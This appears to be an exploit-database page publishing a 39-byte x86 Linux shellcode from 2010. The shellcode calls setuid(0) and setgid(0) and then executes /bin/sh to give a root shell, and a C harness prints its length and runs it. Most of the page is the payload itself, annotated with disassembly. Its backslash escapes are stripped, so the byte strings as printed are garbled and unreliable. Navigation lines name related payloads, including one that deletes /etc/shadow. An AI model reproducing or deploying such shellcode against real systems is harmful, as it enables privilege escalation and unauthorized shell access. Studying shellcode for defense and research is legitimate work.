[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
# Published : 2010-06-01
# Author : gunslinger_
# Previous Title : 33 bytes unlink "/etc/shadow" x86 linux shellcode
# Next Title : Windows Seven x64 (cmd) Shellcode 61 Bytes
/*
Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date : Tue Jun 1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
char *shellcode=
"xebx19" /* jmp 0x804807b */
"x31xc0" /* xor %eax,%eax */
"xb0x17" /* mov $0x17,%al */
"x31xdb" /* xor %ebx,%ebx */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"xb0x2e" /* mov $0x2e,%al */
"x31xdb" /* xor %ebx,%ebx */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"xb0x0b" /* mov $0xb,%al */
"x5b" /* pop %ebx */
"x89xd1" /* mov %edx,%ecx */
"xcdx80" /* int $0x80 */
"xe8xe2xffxffxff" /* call 0x8048062 */
"x2f" /* das */
"x62x69x6e" /* bound %ebp,0x6e(%ecx) */
"x2f" /* das */
"x73x68" /* jae 0x80480ef */
"";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}